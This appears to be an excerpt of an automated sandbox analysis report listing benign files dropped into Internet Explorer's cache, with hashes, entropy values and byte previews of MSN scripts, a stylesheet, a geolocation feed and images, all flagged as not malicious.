                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\location[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):182
                                                                                                                                                                                                                                  Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                  MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                  SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                  SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                  SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\1621266752856-586[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):195845
                                                                                                                                                                                                                                  Entropy (8bit):7.986893102264154
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:oTDjJlV5z0VKP9Wue3nJSnMZ+jVguSAFfdrEuQ3T/ixIBIvRNzWdqx6:o3jJl7Qg9Wuznd+uRXrEuQD/Abidqx6
                                                                                                                                                                                                                                  MD5:441833DE41DFE8D94AC6F8CE4E751EBA
                                                                                                                                                                                                                                  SHA1:0B498BD07F3146008C101714D95A3DD0284F8D85
                                                                                                                                                                                                                                  SHA-256:73C3655356EB29B6DB5B64F7C8E6AEBD1F94A20108AECAB1B26E6A32F205ADEA
                                                                                                                                                                                                                                  SHA-512:FF6D451DCF8F2DA27AD78E9B89BC6A690FE0D0F61B2A251765CEEC6F69D95C291DB8E6C54D27729B25A2FDF2073F7B48558789FFF073C7F5CA28E5BA3E9C6D33
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................p.n.............................................I........................!..1."A..Q#2a.q.B..$3R.b....C...%4Sr..'..&Dcs...................................@......................!1.AQa.q.."........2.B..#R3br..$...4C.S.............?.._+To...g..............H.Aa..|1.$..<~o..#...z..OW9....jv.P~....T.....>?.\W..7...]?...V.U..4l..Y..._...(6~..i.........A.suB....u!..+....]=.......'.....~:2........JL.6......p.e..wW.~y..^<.8...(.&.o3.)..&,."nQ@......y.<~z1,..B.d%C.o.r..F..]..S.7..?7_.9..P+.p..1?..s$.g..9G.."=.B;M....$...?.)q.}"I.#..._.oR>...]..nV..&&3n..K.`...V...=.b..........p...%.,#......c........E.d..6^Z.#..Wi..=..t...V%8$.|..~...d..>..nQJp.W..U..a...c......n....ht..,.P.,.j..w.^..e.%.g.>...T-....`.T.H..W.!..UB..Ex..KQo.G.j_x..3_V.9k..o(..!.t.e.r.P!.r..`..pO.>GJ.Y$5.r...Q:j|.....2d..S.X.^+q.0!...*......M.x..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                                  MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                                  SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                                  SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                                  SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):251398
                                                                                                                                                                                                                                  Entropy (8bit):5.2940351809352855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                                                                                                                                                                                                                  MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                                                                                                                                                                                                                  SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                                                                                                                                                                                                                  SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                                                                                                                                                                                                                  SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\52-478955-68ddb2ab[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):396806
                                                                                                                                                                                                                                  Entropy (8bit):5.324119649220133
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjaXCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdC16tbcjut
                                                                                                                                                                                                                                  MD5:3BBA5129E3BFA05EF2B57F231B5E7A10
                                                                                                                                                                                                                                  SHA1:7CDF93AD45B9624105F0805E3BE03310F43C8B37
                                                                                                                                                                                                                                  SHA-256:270DA5C0051987EBCEDBF06B98110CEE3ADE3E9DA71A3AB5C09C404FBA09CC60
                                                                                                                                                                                                                                  SHA-512:FD976CB278DAC5AB411A0EEDE0BCA22BCFE5D244F56A7666D93C5C3C4C5C55CCBFBAB33143D399E72C9FBB66833A787E3E5114CDBC5F679449923F8867B089A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\96c4d66b-0900-4e9e-bb18-d3bcefb093c5[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):53553
                                                                                                                                                                                                                                  Entropy (8bit):7.956609581726886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:nIczSo3tZl4bzl+48or+cz+5evAM4jge5:nIItf4lpmzevw
                                                                                                                                                                                                                                  MD5:BB344AED4929C6331344227E9D5EAD84
                                                                                                                                                                                                                                  SHA1:5726ACDCFE7CDEB27BECFE771C38029DDD64DADA
                                                                                                                                                                                                                                  SHA-256:370B3C5DBA25F8D53CD5E01CA60BA1B2BC9245AA1C430D8A9773EBBDB8320D81
                                                                                                                                                                                                                                  SHA-512:628D3C53CD23E9CC1B2323300FAE1FC40DF6CCCF5DD8A45E952AC1993662DC9FC9D4BC5D875366FF74F755D3C8A6DF4BF9F09A264BA3B54D57B9B26A4F5B5CA8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................G..........................!1..A"Q..aq2...#B....$...3R.Cbr..%S...c.s....................................=......................!..1A.Qa.."q...2...R.....#B.3br.$SC..............?...g..,6..x...{j:.../.7 .c^.u..!.I..sK.)B.`@)<..6.._.kb...Y.>...Vr.....%^>...tu7.sgJy.IT..@..pu........3.V...x..$.6.GS..t...*.........E..4.C...5..C.q...**.I...M.6Q........Y[*yn:...V..X.)7.n|[..9..b.U.....APR.,..q...c}..O..........[j..M..mo..{o.....+Q..mq...."....?Q.H....P.k.k.c]dZD...QRP..&.zu.......4.*...wE....E......?..fX.1O..}..B.....}......[..kl6V...............K.y.?!.y.....z.4......7.s..`.......RQ.P...V.......30...V.[......e.,....+..tCI[q......{n.M.7 ......U..(.D.mc`U..k........W....2]z.4..I..f.......Z..Z...*7...>...'&P.x6..dl...,6.._..l...Wm.R........\x....j.55.l6
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAMqFmF[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):553
                                                                                                                                                                                                                                  Entropy (8bit):7.46876473352088
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                                                                                                                                                                                                                  MD5:DE563FA7F44557BF8AC02F9768813940
                                                                                                                                                                                                                                  SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                                                                                                                                                                                                                  SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                                                                                                                                                                                                                  SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....RQ......%AD.Vn$R...]n\.........Z..f.....\.A.~.f \H2(2.J.uT.i.u.....0P..s..}.....P..........l...*..P.....~...tb...f,.K.;.X.V...^..x<.b...lr8...bt.]..<.h.d2I.T2...sz...@.p8.x<..pH...g:...DX.Vt:.......eR..$...E.d2I..d..b.R.0...]. .j...v..A....j......H...=....@.'Z^....E|>..tZv".^...#l.[yk(.B<j..#.H..dp.\..m....."#...b.l6.7.-.Q...l6.<.#.H.....\|.....>/^.......eL.....9.z.....lwy....*.g..h?...<...zG...c\d......q.3o9.Y.3.|..Jg...%.t.?>....+..6.0.m.....X.q........IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANf6qa[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                  Entropy (8bit):7.252548911424453
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                                                                                                                                                                                                                  MD5:7ED73D785784B44CF3BD897AB475E5CF
                                                                                                                                                                                                                                  SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                                                                                                                                                                                                                  SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                                                                                                                                                                                                                  SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+.....bIDATx..?..a..?.3.w`.x.&..d..Q.L..LJ^.o...,....DR,.$.O.....r.ws..<.<.|..|..x..?....^..j..r...F..v<.........t.d2.^...x<b6....\.WT...L".`8.R......m.N'..`0H.T..vc...@.H$..+..~..j....N.....~.O.Z%..+..T*.r...#.....F2..X,.Z.h4..R)z..6.s:...l2...l....N>...dB6.%..i...)....q...^..n.K&..^..X,>'..dT)..v:.0D.Q.y>.#.u:.,...Z..r..../h..u....#'.v........._&^....~..ol.#....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANg9R8[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27866
                                                                                                                                                                                                                                  Entropy (8bit):7.9012317290639515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I2Zq3LwC9rPFs42M/6+qsP2BvpTRohxC9HW9M0dAqT:I80drPhR6HuvAqT
                                                                                                                                                                                                                                  MD5:22A765E78393D6675377E20F60E382DE
                                                                                                                                                                                                                                  SHA1:94F6AF29EA57274BFEEE6CCD41EDDB14F0583F24
                                                                                                                                                                                                                                  SHA-256:E621E02B6BB36B9FE5FD1F2E47D08EBCC8BAC15275F3F70569FBC7E116E6F342
                                                                                                                                                                                                                                  SHA-512:B2AAC7B7BC88BEE4BEC9D6EFFC252924B3E7D923C5B9E2FECB90260F29A48BE9A7A16CF04FF0926461CA98AE2E69C116D138335C228A863EB0D8C27F98D02C83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....x...8"..N.5........Y..0}..k.....ib....'..)I..1..@..Sb..0...W#...jYS...+SN.n..{qJ.l.>.8.w.1..`.... .U.$c.5.[..kxF]..*.Hm....@....Ur...6."..mI..L..;2,.i...>R3.Ab.]@.]....Y.RF ..$T.4U.c$.TX..........1I#H.....B.....3z.|.L.p.=..;.|.${.n.nN./p*....'Ke...7e..U._......../.E...G.....a.?......O...4C8.?*Wab6...).....qr....N..q..).....~])....c.......<.-...4.I.C.`.=...
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANuZgF[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):750
                                                                                                                                                                                                                                  Entropy (8bit):7.653501615166515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
                                                                                                                                                                                                                                  MD5:93D77F5C5FFACEBA12A1ABFC6190B947
                                                                                                                                                                                                                                  SHA1:8001474A7342EBF760C66F1C30E48E32E00F2AF3
                                                                                                                                                                                                                                  SHA-256:E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
                                                                                                                                                                                                                                  SHA-512:D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S]HSq...~l.F.af....j..i.(........ ._r...[.!jE.c.....(..\.5.a.X.b.sMj.M.{;....z.....?.......s.--}*..$S.._|..EEA.......*$Q...#N;.d2.a.UU.r.".*lh...k.2...<..S.$>L..,...`$..../*hmr.st+.3Y..(.o..U8.\..G........K...../..q....E...>.EQ..+.j..Y..S.0K... P.%.z....h..=.C.>.`.YD....1."3x......z.1.....$dId.@4U..iG*...Q....[c_.kg.h...._~.?6.....u .N....68.j"....Pv*..$h....S...!...7..h..C"1.".1.,...>.`....L...sF..<..)...}.X..w....J...n[u...V..g.....E.+N......O..R..Yt<.i.y.j.aOM.N_.A..t.i.4a.._...........z....yR[@-..=.x.:....b'h.jmd..../.........P.B.p9...U...wQ.EJhLpi.XJ.....x..B...;6..HT.S.xz....a.(k....f.#.4z..Z g.q......$Z..@y........B..........IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgJnJ[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11532
                                                                                                                                                                                                                                  Entropy (8bit):7.851516433481847
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2JEDuAiMDafoxvWYzzawyHZvxczunLlArDYUbG272hGfc9wBuKEPlxP:NJLAgT8AZWzuLleYr3GfcfK4lxP
                                                                                                                                                                                                                                  MD5:583AD5872841584F57A8D272DBEF1F75
                                                                                                                                                                                                                                  SHA1:7DCEA6EC88FC3091D5F9B6591C461ED9412307B3
                                                                                                                                                                                                                                  SHA-256:DA23C9C4E4ACB95DB36BFF69DEEDF8152B63A84E932D3B17DC63B2D01B885765
                                                                                                                                                                                                                                  SHA-512:709ABC7640C2D509E36B9A428DB8B3DE2247A64AD0AA06704865343046C4A0309C6E4B9808274DDD84911D0B3FC2ACCAF3E7892A224E348D027AF88A99F08F97
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..v.%.......d..UQ`..n"D....L]..l0kt!.6*%...\2.J*....j.Z.Bh.G4....7......E.....C..)$...L........).m+.a.M..3.@.Jj..D.P.ku.%..C...Y......#t...5.^....r.....]....... .#>.vTN......4.2..Nd..*.$T..@D.)F...U.Ul.8..._.2..d.4..%Y......NJ..P...F.D......V...Lb...X..4.C@.#4......(...hLR......c@.....Xw.d.r._.;.2.``..Z .......h.B29.FlP(."..@.E....g...2......dg<..}.....4*M8....B.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgjXB[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7496
                                                                                                                                                                                                                                  Entropy (8bit):7.872783514358589
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qn4PY809lw6ix9juWbyzWHyqQVnqWHLtYJ1xkl6d:0ovVxwWbryqQVnqWHG1H
                                                                                                                                                                                                                                  MD5:60C730BB16740319B2A30E9F11BE67E0
                                                                                                                                                                                                                                  SHA1:74B35979046B1B152F7A9877CAD81CC64E120C0A
                                                                                                                                                                                                                                  SHA-256:CC70CEABB3BE619DD85D82AEA0D3294FDD96093D467B394FE17FE4761E013721
                                                                                                                                                                                                                                  SHA-512:5C3682AF6548F8E2355AEF64D4F9DB864DE73BCD0331AFAFCFC4B5EE4B0B2A5BBBC806DAAC80F10667E97CE7FA9807076E769870310C19ADE9ED5BDA75E920CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..b.1....!....R......Oe...I@..........~. e....*.6.Q..L.g.Rr..u`k5..9O.j...j.fY..?..gN..?..C...95......h..^.Ly............$.~!..&4g..i.AHb.Dm...+..-.!`......v..v.C...)......5'd5....^..5.D.._.CN....5.!.t..5..@1....sL...s.....Sf;.].S.....{w.......|....M..(c......P2[>.....[..}..z....mV.....u.>....G..8.!q@....P.@...l....@......f.?|.i.e.....&.Cj..TX....C.1..f.Q.qMn.;t.......Z....
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgmIX[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12089
                                                                                                                                                                                                                                  Entropy (8bit):7.904789531773816
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QtIaSD1Y9EN+brlhrr8hJ+sDbecdnERkmMtGLhsDmZrgnbLGKnVDXZJ/29qtJXmq:+IaSD1XEbYn+sDbecy/MtGLhrdWdX/2A
                                                                                                                                                                                                                                  MD5:545034BC80A1AACF34CC4EDC5C66F0F4
                                                                                                                                                                                                                                  SHA1:AB11903457FF4F7CCF18CD685EF33CD037BF1965
                                                                                                                                                                                                                                  SHA-256:AE3C9594D1A49BB4B2F04659BF6131D989BE980275C1E12DF7683A2FE804E4B9
                                                                                                                                                                                                                                  SHA-512:EBA05B272F6FF630B31551EC7508B470F18B1817B30988D74B1A80FB4C5BA220E153CBED4E9BE5FC6638B26178E80934F1A2872F69898FB33B916D86CB54E8FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..zb..Z.J.Z.(.h.(.....@...C...zS.6..R.>d>...".....p..h.....Y..QrUW$.).......f1K[Ye.d.....U...!...{.......P.t{y5e....vo.]RD...c..#s..g...Y..<)o#.....?...W.kH.{;.i...6...c_|f..Y=.J.l\X.......(..)\..(..P................ P.I&..(.h.......@......Z.(......(....Z.;S........)..1@.I4.C-.Jr...E."..2J.M..l..9..x.4.m..d.#..O...8V.N....R.6r.......g..l..[M[bH.$.......;=.....M.....(....(...
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgpXv[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
